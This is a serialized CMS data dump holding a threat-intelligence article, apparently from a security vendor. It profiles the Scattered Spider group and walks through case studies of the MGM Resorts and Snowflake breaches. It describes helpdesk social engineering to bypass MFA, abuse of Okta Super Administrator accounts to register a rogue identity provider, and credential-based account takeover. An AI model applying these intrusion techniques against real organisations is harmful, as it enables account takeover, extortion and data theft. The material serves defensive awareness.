scams",{"url":100704},{"items":103036},[103037,103039],{"sys":103038,"name":505},{"id":504},{"sys":103040,"name":509},{"id":508},{"items":103042},[103043,103596,103901],{"__typename":1528,"sys":103044,"content":103045,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":103586,"authorsCollection":103592},{"id":92907},{"json":103046},{"nodeType":165,"data":103047,"content":103048},{},[103049,103055,103061,103068,103091,103097,103102,103105,103112,103118,103124,103163,103169,103175,103178,103185,103191,103197,103203,103219,103225,103230,103237,103243,103249,103255,103260,103263,103270,103277,103283,103290,103296,103354,103360,103367,103373,103403,103410,103416,103423,103429,103436,103442,103490,103496,103499,103506,103512,103527,103557,103575,103580],{"nodeType":178,"data":103050,"content":103051},{},[103052],{"nodeType":173,"value":92916,"marks":103053,"data":103054},[],{},{"nodeType":178,"data":103056,"content":103057},{},[103058],{"nodeType":173,"value":92923,"marks":103059,"data":103060},[],{},{"nodeType":178,"data":103062,"content":103063},{},[103064],{"nodeType":173,"value":92930,"marks":103065,"data":103067},[103066],{"type":370},{},{"nodeType":178,"data":103069,"content":103070},{},[103071,103074,103081,103084,103088],{"nodeType":173,"value":92938,"marks":103072,"data":103073},[],{},{"nodeType":186,"data":103075,"content":103076},{"uri":92943},[103077],{"nodeType":173,"value":92946,"marks":103078,"data":103080},[103079],{"type":194},{},{"nodeType":173,"value":92951,"marks":103082,"data":103083},[],{},{"nodeType":173,"value":92955,"marks":103085,"data":103087},[103086],{"type":1646},{},{"nodeType":173,"value":92960,"marks":103089,"data":103090},[],{},{"nodeType":178,"data":103092,"content":103093},{},[103094],{"nodeType":173,"value":92967,"marks":103095,"data":103096},[],{},{"nodeType":312,"data":103098,"content":103101},{"target":103099},{"sys":103100},{"id":92974,"type":317,"linkType":318},[],{"nodeType":231,"data":103103,"content":103104},{},[],{"nodeType":169,"data":103106,"content":103107},{},[103108],{"nodeType":173,"value":92983,"marks":103109,"data":103111},[103110],{"type":370},{},{"nodeType":178,"data":103113,"content":103114},{},[103115],{"nodeType":173,"value":92991,"marks":103116,"data":103117},[],{},{"nodeType":178,"data":103119,"content":103120},{},[103121],{"nodeType":173,"value":92998,"marks":103122,"data":103123},[],{},{"nodeType":250,"data":103125,"content":103126},{},[103127,103136,103145,103154],{"nodeType":254,"data":103128,"content":103129},{},[103130],{"nodeType":178,"data":103131,"content":103132},{},[103133],{"nodeType":173,"value":93011,"marks":103134,"data":103135},[],{},{"nodeType":254,"data":103137,"content":103138},{},[103139],{"nodeType":178,"data":103140,"content":103141},{},[103142],{"nodeType":173,"value":93021,"marks":103143,"data":103144},[],{},{"nodeType":254,"data":103146,"content":103147},{},[103148],{"nodeType":178,"data":103149,"content":103150},{},[103151],{"nodeType":173,"value":93031,"marks":103152,"data":103153},[],{},{"nodeType":254,"data":103155,"content":103156},{},[103157],{"nodeType":178,"data":103158,"content":103159},{},[103160],{"nodeType":173,"value":93041,"marks":103161,"data":103162},[],{},{"nodeType":178,"data":103164,"content":103165},{},[103166],{"nodeType":173,"value":93048,"marks":103167,"data":103168},[],{},{"nodeType":178,"data":103170,"content":103171},{},[103172],{"nodeType":173,"value":93055,"marks":103173,"data":103174},[],{},{"nodeType":231,"data":103176,"content":103177},{},[],{"nodeType":169,"data":103179,"content":103180},{},[103181],{"nodeType":173,"value":93065,"marks":103182,"data":103184},[103183],{"type":370},{},{"nodeType":178,"data":103186,"content":103187},{},[103188],{"nodeType":173,"value":93073,"marks":103189,"data":103190},[],{},{"nodeType":178,"data":103192,"content":103193},{},[103194],{"nodeType":173,"value":93080,"marks":103195,"data":103196},[],{},{"nodeType":178,"data":103198,"content":103199},{},[103200],{"nodeType":173,"value":93087,"marks":103201,"data":103202},[],{},{"nodeType":178,"data":103204,"content":103205},{},[103206,103209,103216],{"nodeType":173,"value":93094,"marks":103207,"data":103208},[],{},{"nodeType":186,"data":103210,"content":103211},{"uri":27726},[103212],{"nodeType":173,"value":27729,"marks":103213,"data":103215},[103214],{"type":194},{},{"nodeType":173,"value":93105,"marks":103217,"data":103218},[],{},{"nodeType":178,"data":103220,"content":103221},{},[103222],{"nodeType":173,"value":93112,"marks":103223,"data":103224},[],{},{"nodeType":312,"data":103226,"content":103229},{"target":103227},{"sys":103228},{"id":93119,"type":317,"linkType":318},[],{"nodeType":169,"data":103231,"content":103232},{},[103233],{"nodeType":173,"value":93125,"marks":103234,"data":103236},[103235],{"type":370},{},{"nodeType":178,"data":103238,"content":103239},{},[103240],{"nodeType":173,"value":93133,"marks":103241,"data":103242},[],{},{"nodeType":178,"data":103244,"content":103245},{},[103246],{"nodeType":173,"value":93140,"marks":103247,"data":103248},[],{},{"nodeType":178,"data":103250,"content":103251},{},[103252],{"nodeType":173,"value":93147,"marks":103253,"data":103254},[],{},{"nodeType":312,"data":103256,"content":103259},{"target":103257},{"sys":103258},{"id":93154,"type":317,"linkType":318},[],{"nodeType":231,"data":103261,"content":103262},{},[],{"nodeType":169,"data":103264,"content":103265},{},[103266],{"nodeType":173,"value":93163,"marks":103267,"data":103269},[103268],{"type":370},{},{"nodeType":235,"data":103271,"content":103272},{},[103273],{"nodeType":173,"value":93171,"marks":103274,"data":103276},[103275],{"type":370},{},{"nodeType":178,"data":103278,"content":103279},{},[103280],{"nodeType":173,"value":93179,"marks":103281,"data":103282},[],{},{"nodeType":235,"data":103284,"content":103285},{},[103286],{"nodeType":173,"value":93186,"marks":103287,"data":103289},[103288],{"type":370},{},{"nodeType":178,"data":103291,"content":103292},{},[103293],{"nodeType":173,"value":93194,"marks":103294,"data":103295},[],{},{"nodeType":250,"data":103297,"content":103298},{},[103299,103308,103317,103336,103345],{"nodeType":254,"data":103300,"content":103301},{},[103302],{"nodeType":178,"data":103303,"content":103304},{},[103305],{"nodeType":173,"value":93207,"marks":103306,"data":103307},[],{},{"nodeType":254,"data":103309,"content":103310},{},[103311],{"nodeType":178,"data":103312,"content":103313},{},[103314],{"nodeType":173,"value":93217,"marks":103315,"data":103316},[],{},{"nodeType":254,"data":103318,"content":103319},{},[103320],{"nodeType":178,"data":103321,"content":103322},{},[103323,103326,103333],{"nodeType":173,"value":74365,"marks":103324,"data":103325},[],{},{"nodeType":186,"data":103327,"content":103328},{"uri":74370},[103329],{"nodeType":173,"value":74373,"marks":103330,"data":103332},[103331],{"type":194},{},{"nodeType":173,"value":37,"marks":103334,"data":103335},[],{},{"nodeType":254,"data":103337,"content":103338},{},[103339],{"nodeType":178,"data":103340,"content":103341},{},[103342],{"nodeType":173,"value":93246,"marks":103343,"data":103344},[],{},{"nodeType":254,"data":103346,"content":103347},{},[103348],{"nodeType":178,"data":103349,"content":103350},{},[103351],{"nodeType":173,"value":93256,"marks":103352,"data":103353},[],{},{"nodeType":178,"data":103355,"content":103356},{},[103357],{"nodeType":173,"value":93263,"marks":103358,"data":103359},[],{},{"nodeType":235,"data":103361,"content":103362},{},[103363],{"nodeType":173,"value":93270,"marks":103364,"data":103366},[103365],{"type":370},{},{"nodeType":178,"data":103368,"content":103369},{},[103370],{"nodeType":173,"value":93278,"marks":103371,"data":103372},[],{},{"nodeType":250,"data":103374,"content":103375},{},[103376,103385,103394],{"nodeType":254,"data":103377,"content":103378},{},[103379],{"nodeType":178,"data":103380,"content":103381},{},[103382],{"nodeType":173,"value":93291,"marks":103383,"data":103384},[],{},{"nodeType":254,"data":103386,"content":103387},{},[103388],{"nodeType":178,"data":103389,"content":103390},{},[103391],{"nodeType":173,"value":93301,"marks":103392,"data":103393},[],{},{"nodeType":254,"data":103395,"content":103396},{},[103397],{"nodeType":178,"data":103398,"content":103399},{},[103400],{"nodeType":173,"value":93311,"marks":103401,"data":103402},[],{},{"nodeType":235,"data":103404,"content":103405},{},[103406],{"nodeType":173,"value":93318,"marks":103407,"data":103409},[103408],{"type":370},{},{"nodeType":178,"data":103411,"content":103412},{},[103413],{"nodeType":173,"value":93326,"marks":103414,"data":103415},[],{},{"nodeType":235,"data":103417,"content":103418},{},[103419],{"nodeType":173,"value":93333,"marks":103420,"data":103422},[103421],{"type":370},{},{"nodeType":178,"data":103424,"content":103425},{},[103426],{"nodeType":173,"value":93341,"marks":103427,"data":103428},[],{},{"nodeType":235,"data":103430,"content":103431},{},[103432],{"nodeType":173,"value":93348,"marks":103433,"data":103435},[103434],{"type":370},{},{"nodeType":178,"data":103437,"content":103438},{},[103439],{"nodeType":173,"value":93356,"marks":103440,"data":103441},[],{},{"nodeType":250,"data":103443,"content":103444},{},[103445,103454,103463,103472,103481],{"nodeType":254,"data":103446,"content":103447},{},[103448],{"nodeType":178,"data":103449,"content":103450},{},[103451],{"nodeType":173,"value":93369,"marks":103452,"data":103453},[],{},{"nodeType":254,"data":103455,"content":103456},{},[103457],{"nodeType":178,"data":103458,"content":103459},{},[103460],{"nodeType":173,"value":93379,"marks":103461,"data":103462},[],{},{"nodeType":254,"data":103464,"content":103465},{},[103466],{"nodeType":178,"data":103467,"content":103468},{},[103469],{"nodeType":173,"value":93389,"marks":103470,"data":103471},[],{},{"nodeType":254,"data":103473,"content":103474},{},[103475],{"nodeType":178,"data":103476,"content":103477},{},[103478],{"nodeType":173,"value":93399,"marks":103479,"data":103480},[],{},{"nodeType":254,"data":103482,"content":103483},{},[103484],{"nodeType":178,"data":103485,"content":103486},{},[103487],{"nodeType":173,"value":93409,"marks":103488,"data":103489},[],{},{"nodeType":178,"data":103491,"content":103492},{},[103493],{"nodeType":173,"value":93416,"marks":103494,"data":103495},[],{},{"nodeType":231,"data":103497,"content":103498},{},[],{"nodeType":169,"data":103500,"content":103501},{},[103502],{"nodeType":173,"value":93426,"marks":103503,"data":103505},[103504],{"type":370},{},{"nodeType":178,"data":103507,"content":103508},{},[103509],{"nodeType":173,"value":93434,"marks":103510,"data":103511},[],{},{"nodeType":178,"data":103513,"content":103514},{},[103515,103518,103524],{"nodeType":173,"value":93441,"marks":103516,"data":103517},[],{},{"nodeType":186,"data":103519,"content":103520},{"uri":92943},[103521],{"nodeType":173,"value":93448,"marks":103522,"data":103523},[],{},{"nodeType":173,"value":1477,"marks":103525,"data":103526},[],{},{"nodeType":250,"data":103528,"content":103529},{},[103530,103539,103548],{"nodeType":254,"data":103531,"content":103532},{},[103533],{"nodeType":178,"data":103534,"content":103535},{},[103536],{"nodeType":173,"value":93464,"marks":103537,"data":103538},[],{},{"nodeType":254,"data":103540,"content":103541},{},[103542],{"nodeType":178,"data":103543,"content":103544},{},[103545],{"nodeType":173,"value":93474,"marks":103546,"data":103547},[],{},{"nodeType":254,"data":103549,"content":103550},{},[103551],{"nodeType":178,"data":103552,"content":103553},{},[103554],{"nodeType":173,"value":93484,"marks":103555,"data":103556},[],{},{"nodeType":178,"data":103558,"content":103559},{},[103560,103564,103571],{"nodeType":173,"value":93491,"marks":103561,"data":103563},[103562],{"type":370},{},{"nodeType":186,"data":103565,"content":103566},{"uri":473},[103567],{"nodeType":173,"value":93499,"marks":103568,"data":103570},[103569],{"type":370},{},{"nodeType":173,"value":93504,"marks":103572,"data":103574},[103573],{"type":370},{},{"nodeType":312,"data":103576,"content":103579},{"target":103577},{"sys":103578},{"id":93512,"type":317,"linkType":318},[],{"nodeType":178,"data":103581,"content":103582},{},[103583],{"nodeType":173,"value":37,"marks":103584,"data":103585},[],{},{"items":103587},[103588,103590],{"sys":103589,"name":505},{"id":504},{"sys":103591,"name":509},{"id":508},{"items":103593},[103594],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":103595},{"url":25597},{"__typename":1528,"sys":103597,"content":103598,"title":46338,"synopsis":88214,"hashTags":118,"publishedDate":88215,"slug":46339,"tagsCollection":103893,"authorsCollection":103897},{"id":25128},{"json":103599},{"nodeType":165,"data":103600,"content":103601},{},[103602,103608,103614,103620,103625,103631,103661,103667,103673,103679,103684,103690,103696,103711,103716,103722,103738,103754,103760,103766,103772,103778,103784,103790,103796,103812,103818,103824,103829,103835,103841,103861,103866,103882,103887],{"nodeType":178,"data":103603,"content":103604},{},[103605],{"nodeType":173,"value":87881,"marks":103606,"data":103607},[],{},{"nodeType":178,"data":103609,"content":103610},{},[103611],{"nodeType":173,"value":87888,"marks":103612,"data":103613},[],{},{"nodeType":178,"data":103615,"content":103616},{},[103617],{"nodeType":173,"value":87895,"marks":103618,"data":103619},[],{},{"nodeType":312,"data":103621,"content":103624},{"target":103622},{"sys":103623},{"id":87902,"type":317,"linkType":318},[],{"nodeType":178,"data":103626,"content":103627},{},[103628],{"nodeType":173,"value":87908,"marks":103629,"data":103630},[],{},{"nodeType":250,"data":103632,"content":103633},{},[103634,103643,103652],{"nodeType":254,"data":103635,"content":103636},{},[103637],{"nodeType":178,"data":103638,"content":103639},{},[103640],{"nodeType":173,"value":87921,"marks":103641,"data":103642},[],{},{"nodeType":254,"data":103644,"content":103645},{},[103646],{"nodeType":178,"data":103647,"content":103648},{},[103649],{"nodeType":173,"value":87931,"marks":103650,"data":103651},[],{},{"nodeType":254,"data":103653,"content":103654},{},[103655],{"nodeType":178,"data":103656,"content":103657},{},[103658],{"nodeType":173,"value":87941,"marks":103659,"data":103660},[],{},{"nodeType":178,"data":103662,"content":103663},{},[103664],{"nodeType":173,"value":87948,"marks":103665,"data":103666},[],{},{"nodeType":169,"data":103668,"content":103669},{},[103670],{"nodeType":173,"value":87955,"marks":103671,"data":103672},[],{},{"nodeType":178,"data":103674,"content":103675},{},[103676],{"nodeType":173,"value":87962,"marks":103677,"data":103678},[],{},{"nodeType":312,"data":103680,"content":103683},{"target":103681},{"sys":103682},{"id":87969,"type":317,"linkType":318},[],{"nodeType":178,"data":103685,"content":103686},{},[103687],{"nodeType":173,"value":87975,"marks":103688,"data":103689},[],{},{"nodeType":169,"data":103691,"content":103692},{},[103693],{"nodeType":173,"value":87982,"marks":103694,"data":103695},[],{},{"nodeType":178,"data":103697,"content":103698},{},[103699,103702,103708],{"nodeType":173,"value":87989,"marks":103700,"data":103701},[],{},{"nodeType":186,"data":103703,"content":103704},{"uri":63182},[103705],{"nodeType":173,"value":87996,"marks":103706,"data":103707},[],{},{"nodeType":173,"value":88000,"marks":103709,"data":103710},[],{},{"nodeType":312,"data":103712,"content":103715},{"target":103713},{"sys":103714},{"id":88007,"type":317,"linkType":318},[],{"nodeType":235,"data":103717,"content":103718},{},[103719],{"nodeType":173,"value":88013,"marks":103720,"data":103721},[],{},{"nodeType":178,"data":103723,"content":103724},{},[103725,103728,103735],{"nodeType":173,"value":88020,"marks":103726,"data":103727},[],{},{"nodeType":186,"data":103729,"content":103730},{"uri":88025},[103731],{"nodeType":173,"value":88028,"marks":103732,"data":103734},[103733],{"type":194},{},{"nodeType":173,"value":88033,"marks":103736,"data":103737},[],{},{"nodeType":178,"data":103739,"content":103740},{},[103741,103744,103751],{"nodeType":173,"value":88040,"marks":103742,"data":103743},[],{},{"nodeType":186,"data":103745,"content":103746},{"uri":989},[103747],{"nodeType":173,"value":992,"marks":103748,"data":103750},[103749],{"type":194},{},{"nodeType":173,"value":88051,"marks":103752,"data":103753},[],{},{"nodeType":178,"data":103755,"content":103756},{},[103757],{"nodeType":173,"value":88058,"marks":103758,"data":103759},[],{},{"nodeType":178,"data":103761,"content":103762},{},[103763],{"nodeType":173,"value":88065,"marks":103764,"data":103765},[],{},{"nodeType":235,"data":103767,"content":103768},{},[103769],{"nodeType":173,"value":88072,"marks":103770,"data":103771},[],{},{"nodeType":178,"data":103773,"content":103774},{},[103775],{"nodeType":173,"value":88079,"marks":103776,"data":103777},[],{},{"nodeType":178,"data":103779,"content":103780},{},[103781],{"nodeType":173,"value":88086,"marks":103782,"data":103783},[],{},{"nodeType":169,"data":103785,"content":103786},{},[103787],{"nodeType":173,"value":88093,"marks":103788,"data":103789},[],{},{"nodeType":178,"data":103791,"content":103792},{},[103793],{"nodeType":173,"value":88100,"marks":103794,"data":103795},[],{},{"nodeType":178,"data":103797,"content":103798},{},[103799,103802,103809],{"nodeType":173,"value":88107,"marks":103800,"data":103801},[],{},{"nodeType":186,"data":103803,"content":103804},{"uri":88112},[103805],{"nodeType":173,"value":88115,"marks":103806,"data":103808},[103807],{"type":194},{},{"nodeType":173,"value":88120,"marks":103810,"data":103811},[],{},{"nodeType":178,"data":103813,"content":103814},{},[103815],{"nodeType":173,"value":88127,"marks":103816,"data":103817},[],{},{"nodeType":178,"data":103819,"content":103820},{},[103821],{"nodeType":173,"value":88134,"marks":103822,"data":103823},[],{},{"nodeType":312,"data":103825,"content":103828},{"target":103826},{"sys":103827},{"id":88141,"type":317,"linkType":318},[],{"nodeType":169,"data":103830,"content":103831},{},[103832],{"nodeType":173,"value":88147,"marks":103833,"data":103834},[],{},{"nodeType":178,"data":103836,"content":103837},{},[103838],{"nodeType":173,"value":88154,"marks":103839,"data":103840},[],{},{"nodeType":178,"data":103842,"content":103843},{},[103844,103847,103851,103854,103858],{"nodeType":173,"value":65787,"marks":103845,"data":103846},[],{},{"nodeType":173,"value":2789,"marks":103848,"data":103850},[103849],{"type":370},{},{"nodeType":173,"value":65795,"marks":103852,"data":103853},[],{},{"nodeType":173,"value":65800,"marks":103855,"data":103857},[103856],{"type":370},{},{"nodeType":173,"value":65804,"marks":103859,"data":103860},[],{},{"nodeType":312,"data":103862,"content":103865},{"target":103863},{"sys":103864},{"id":88181,"type":317,"linkType":318},[],{"nodeType":178,"data":103867,"content":103868},{},[103869,103872,103879],{"nodeType":173,"value":88187,"marks":103870,"data":103871},[],{},{"nodeType":186,"data":103873,"content":103874},{"uri":473},[103875],{"nodeType":173,"value":88194,"marks":103876,"data":103878},[103877],{"type":194},{},{"nodeType":173,"value":88199,"marks":103880,"data":103881},[],{},{"nodeType":312,"data":103883,"content":103886},{"target":103884},{"sys":103885},{"id":88206,"type":317,"linkType":318},[],{"nodeType":178,"data":103888,"content":103889},{},[103890],{"nodeType":173,"value":37,"marks":103891,"data":103892},[],{},{"items":103894},[103895],{"sys":103896,"name":26137},{"id":26136},{"items":103898},[103899],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":103900},{"url":516},{"__typename":1528,"sys":103902,"content":103903,"title":46334,"synopsis":105212,"hashTags":118,"publishedDate":105213,"slug":46335,"tagsCollection":105214,"authorsCollection":105220},{"id":25066},{"json":103904},{"nodeType":165,"data":103905,"content":103906},{},[103907,103912,103920,103927,103955,103961,103969,103998,104040,104046,104054,104072,104078,104081,104089,104096,104102,104143,104274,104277,104285,104292,104300,104331,104337,104345,104365,104372,104378,104385,104391,104410,104418,104436,104444,104451,104458,104461,104469,104476,104482,104489,104497,104515,104522,104527,104535,104542,104549,104580,104586,104593,104601,104608,104613,104644,104652,104672,104679,104685,104693,104712,104719,104782,104788,104791,104799,104806,104813,104844,104847,104855,104863,104869,104876,104884,104890,104897,104904,104909,104916,104924,104931,104938,104945,104964,104982,104989,104996,105002,105009,105017,105024,105031,105037,105044,105052,105059,105066,105073,105079,105086,105094,105101,105119,105125,105132,105149,105154,105160,105176,105181,105184,105191,105197],{"nodeType":312,"data":103908,"content":103911},{"target":103909},{"sys":103910},{"id":100724,"type":317,"linkType":318},[],{"nodeType":169,"data":103913,"content":103914},{},[103915],{"nodeType":173,"value":103916,"marks":103917,"data":103919},"Background: Who are Scattered Spider?",[103918],{"type":370},{},{"nodeType":178,"data":103921,"content":103922},{},[103923],{"nodeType":173,"value":103924,"marks":103925,"data":103926},"Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) is a native English speaking, financially motivated criminal collective known for high-profile cyber breaches in recent years, including MoneyGram, Transport for London, Caesars, MGM Resorts, Clorox, DoorDash, Twilio, Reddit, Coinbase, MailChimp, Okta, HubSpot, Cloudflare, Activision, Pure Storage, and the ongoing Marks & Spencer, Co-op, and Harrods incidents.",[],{},{"nodeType":178,"data":103928,"content":103929},{},[103930,103934,103941,103944,103951],{"nodeType":173,"value":103931,"marks":103932,"data":103933},"Scattered Spider shares similar characteristics and TTPs with a number of named threat groups such as ",[],{},{"nodeType":186,"data":103935,"content":103936},{"uri":102646},[103937],{"nodeType":173,"value":102649,"marks":103938,"data":103940},[103939],{"type":194},{},{"nodeType":173,"value":9534,"marks":103942,"data":103943},[],{},{"nodeType":186,"data":103945,"content":103946},{"uri":819},[103947],{"nodeType":173,"value":102660,"marks":103948,"data":103950},[103949],{"type":194},{},{"nodeType":173,"value":103952,"marks":103953,"data":103954}," (behind the Snowflake attacks in 2024).",[],{},{"nodeType":312,"data":103956,"content":103960},{"target":103957},{"sys":103958},{"id":103959,"type":317,"linkType":318},"4sgT2Jw3iODUTdG2oPOrFC",[],{"nodeType":235,"data":103962,"content":103963},{},[103964],{"nodeType":173,"value":103965,"marks":103966,"data":103968},"Case study: MGM Resorts",[103967],{"type":370},{},{"nodeType":178,"data":103970,"content":103971},{},[103972,103976,103983,103987,103994],{"nodeType":173,"value":103973,"marks":103974,"data":103975},"One of Scattered Spider’s most notorious and well-documented attacks was that affecting ",[],{},{"nodeType":186,"data":103977,"content":103978},{"uri":88025},[103979],{"nodeType":173,"value":88028,"marks":103980,"data":103982},[103981],{"type":194},{},{"nodeType":173,"value":103984,"marks":103985,"data":103986},". Scattered Spider socially engineered MGM Resorts helpdesk personnel bypass MFA and log into accounts for which they had acquired valid login credentials for via credential phishing and historical infostealer compromises. They specifically targeted accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":186,"data":103988,"content":103989},{"uri":989},[103990],{"nodeType":173,"value":992,"marks":103991,"data":103993},[103992],{"type":194},{},{"nodeType":173,"value":103995,"marks":103996,"data":103997},", which enabled them to impersonate any user within the Okta tenant. This then enabled them to abuse SSO access to downstream apps and platforms from various accounts, culminating in deployment of ransomware to around 100 ESXi servers and data exfiltration. ",[],{},{"nodeType":178,"data":103999,"content":104000},{},[104001,104005,104010,104014,104019,104023,104028,104032,104037],{"nodeType":173,"value":104002,"marks":104003,"data":104004},"The breach resulted in a ",[],{},{"nodeType":173,"value":104006,"marks":104007,"data":104009},"36-hour outage",[104008],{"type":370},{},{"nodeType":173,"value":104011,"marks":104012,"data":104013},", a ",[],{},{"nodeType":173,"value":104015,"marks":104016,"data":104018},"$100M ",[104017],{"type":370},{},{"nodeType":173,"value":104020,"marks":104021,"data":104022},"hit to its Q3 results, one-time cyber consulting fees in the region of ",[],{},{"nodeType":173,"value":104024,"marks":104025,"data":104027},"$10M",[104026],{"type":370},{},{"nodeType":173,"value":104029,"marks":104030,"data":104031},", and a class-action lawsuit later settled for ",[],{},{"nodeType":173,"value":104033,"marks":104034,"data":104036},"$45M",[104035],{"type":370},{},{"nodeType":173,"value":197,"marks":104038,"data":104039},[],{},{"nodeType":312,"data":104041,"content":104045},{"target":104042},{"sys":104043},{"id":104044,"type":317,"linkType":318},"2vYvBXqFeKt7Ix0Ynh8cZu",[],{"nodeType":235,"data":104047,"content":104048},{},[104049],{"nodeType":173,"value":104050,"marks":104051,"data":104053},"Case Study: Snowflake",[104052],{"type":370},{},{"nodeType":178,"data":104055,"content":104056},{},[104057,104061,104068],{"nodeType":173,"value":104058,"marks":104059,"data":104060},"Members of Scattered Spider have been affiliated with ShinyHunters, the group behind the ",[],{},{"nodeType":186,"data":104062,"content":104063},{"uri":819},[104064],{"nodeType":173,"value":104065,"marks":104066,"data":104067},"Snowflake breaches in mid-2024",[],{},{"nodeType":173,"value":104069,"marks":104070,"data":104071},". ShinyHunters associates targeted ~165 organizations that were subjected to account takeover attacks using stolen credentials harvested from historical infostealer infections dating back as far as 2020, according to Mandiant’s investigation. In total, 9 public victims were named following the breach, collectively impacting hundreds of millions of people. Snowflake was a watershed moment that signalled the significant opportunity presented by identity attacks on cloud services. It demonstrated how comparatively unsophisticated methods (logging in to user accounts with stolen credentials and dumping the data) can have the same or greater impact as a traditional network or endpoint based cyber attack involving vulnerability exploitation, malware deployment, ransomware, etc.",[],{},{"nodeType":312,"data":104073,"content":104077},{"target":104074},{"sys":104075},{"id":104076,"type":317,"linkType":318},"49nJMPQjQ37Mfr2yWA56P3",[],{"nodeType":231,"data":104079,"content":104080},{},[],{"nodeType":169,"data":104082,"content":104083},{},[104084],{"nodeType":173,"value":104085,"marks":104086,"data":104088},"Arrests haven’t slowed Scattered Spider",[104087],{"type":370},{},{"nodeType":178,"data":104090,"content":104091},{},[104092],{"nodeType":173,"value":104093,"marks":104094,"data":104095},"In late 2024 following the Transport for London attacks (which resulted in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users bank details, and all 30,000 staff members having to reset their online credentials in person) a series of arrests were made in the UK and USA. ",[],{},{"nodeType":312,"data":104097,"content":104101},{"target":104098},{"sys":104099},{"id":104100,"type":317,"linkType":318},"2X2nyhO2hOqm9f0Le4lDC5",[],{"nodeType":178,"data":104103,"content":104104},{},[104105,104109,104117,104120,104127,104130,104139],{"nodeType":173,"value":104106,"marks":104107,"data":104108},"However, this doesn’t seem to have impacted Scattered Spider’s ability to operate, with the ongoing campaign against UK retail companies including ",[],{},{"nodeType":186,"data":104110,"content":104112},{"uri":104111},"https://www.bleepingcomputer.com/news/security/marks-and-spencer-breach-linked-to-scattered-spider-ransomware-attack/",[104113],{"nodeType":173,"value":100738,"marks":104114,"data":104116},[104115],{"type":194},{},{"nodeType":173,"value":2936,"marks":104118,"data":104119},[],{},{"nodeType":186,"data":104121,"content":104122},{"uri":100747},[104123],{"nodeType":173,"value":100750,"marks":104124,"data":104126},[104125],{"type":194},{},{"nodeType":173,"value":9534,"marks":104128,"data":104129},[],{},{"nodeType":186,"data":104131,"content":104133},{"uri":104132},"https://www.bleepingcomputer.com/news/security/harrods-the-next-uk-retailer-targeted-in-a-cyberattack/",[104134],{"nodeType":173,"value":104135,"marks":104136,"data":104138},"Harrods",[104137],{"type":194},{},{"nodeType":173,"value":104140,"marks":104141,"data":104142}," being strongly linked to Scattered Spider. Beginning on Easter weekend, the Marks and Spencer attack has had the biggest impact so far, resulting in severe disruption to the retailer with agency staff told not to come into work, online shopping services being taken offline, stores running low on products, £300M in lost profits, and almost £1B wiped off the company’s stock market valuation at one stage. ",[],{},{"nodeType":178,"data":104144,"content":104145},{},[104146,104149,104156,104159,104166,104169,104176,104179,104186,104189,104196,104199,104206,104209,104216,104220,104226,104229,104235,104238,104244,104247,104253,104256,104262,104265,104271],{"nodeType":173,"value":100762,"marks":104147,"data":104148},[],{},{"nodeType":186,"data":104150,"content":104151},{"uri":100767},[104152],{"nodeType":173,"value":100770,"marks":104153,"data":104155},[104154],{"type":194},{},{"nodeType":173,"value":2936,"marks":104157,"data":104158},[],{},{"nodeType":186,"data":104160,"content":104161},{"uri":100779},[104162],{"nodeType":173,"value":100782,"marks":104163,"data":104165},[104164],{"type":194},{},{"nodeType":173,"value":2936,"marks":104167,"data":104168},[],{},{"nodeType":186,"data":104170,"content":104171},{"uri":100791},[104172],{"nodeType":173,"value":100794,"marks":104173,"data":104175},[104174],{"type":194},{},{"nodeType":173,"value":2936,"marks":104177,"data":104178},[],{},{"nodeType":186,"data":104180,"content":104181},{"uri":100803},[104182],{"nodeType":173,"value":100806,"marks":104183,"data":104185},[104184],{"type":194},{},{"nodeType":173,"value":2936,"marks":104187,"data":104188},[],{},{"nodeType":186,"data":104190,"content":104191},{"uri":100815},[104192],{"nodeType":173,"value":100818,"marks":104193,"data":104195},[104194],{"type":194},{},{"nodeType":173,"value":2936,"marks":104197,"data":104198},[],{},{"nodeType":186,"data":104200,"content":104201},{"uri":100827},[104202],{"nodeType":173,"value":100830,"marks":104203,"data":104205},[104204],{"type":194},{},{"nodeType":173,"value":9534,"marks":104207,"data":104208},[],{},{"nodeType":186,"data":104210,"content":104211},{"uri":100839},[104212],{"nodeType":173,"value":100842,"marks":104213,"data":104215},[104214],{"type":194},{},{"nodeType":173,"value":104217,"marks":104218,"data":104219}," were among the retailers to suffer a breach between May-June 2025. More recently, Scattered Spider has targeted U.S. insurance giant ",[],{},{"nodeType":186,"data":104221,"content":104222},{"uri":100859},[104223],{"nodeType":173,"value":100862,"marks":104224,"data":104225},[],{},{"nodeType":173,"value":2936,"marks":104227,"data":104228},[],{},{"nodeType":186,"data":104230,"content":104231},{"uri":100871},[104232],{"nodeType":173,"value":100874,"marks":104233,"data":104234},[],{},{"nodeType":173,"value":2936,"marks":104236,"data":104237},[],{},{"nodeType":186,"data":104239,"content":104240},{"uri":100884},[104241],{"nodeType":173,"value":100887,"marks":104242,"data":104243},[],{},{"nodeType":173,"value":2936,"marks":104245,"data":104246},[],{},{"nodeType":186,"data":104248,"content":104249},{"uri":100908},[104250],{"nodeType":173,"value":100911,"marks":104251,"data":104252},[],{},{"nodeType":173,"value":2936,"marks":104254,"data":104255},[],{},{"nodeType":186,"data":104257,"content":104258},{"uri":100908},[104259],{"nodeType":173,"value":100921,"marks":104260,"data":104261},[],{},{"nodeType":173,"value":9534,"marks":104263,"data":104264},[],{},{"nodeType":186,"data":104266,"content":104267},{"uri":100897},[104268],{"nodeType":173,"value":100900,"marks":104269,"data":104270},[],{},{"nodeType":173,"value":1477,"marks":104272,"data":104273},[],{},{"nodeType":231,"data":104275,"content":104276},{},[],{"nodeType":169,"data":104278,"content":104279},{},[104280],{"nodeType":173,"value":104281,"marks":104282,"data":104284},"Scattered Spider TTP analysis",[104283],{"type":370},{},{"nodeType":178,"data":104286,"content":104287},{},[104288],{"nodeType":173,"value":104289,"marks":104290,"data":104291},"Along with a clear MO (financial gain via data exfiltration and extortion) Scattered Spider has demonstrated a pattern of go-to TTPs over recent years. ",[],{},{"nodeType":235,"data":104293,"content":104294},{},[104295],{"nodeType":173,"value":104296,"marks":104297,"data":104299},"Social engineering, help desk scams, and SIM 